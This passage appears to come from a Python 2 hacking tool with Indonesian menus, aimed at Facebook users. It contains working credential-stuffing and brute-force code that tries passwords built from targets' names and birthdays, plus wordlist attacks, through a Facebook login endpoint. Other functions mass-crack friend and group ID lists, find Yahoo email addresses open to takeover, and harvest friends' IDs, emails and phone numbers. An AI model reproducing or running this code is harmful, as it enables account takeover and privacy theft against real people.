print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
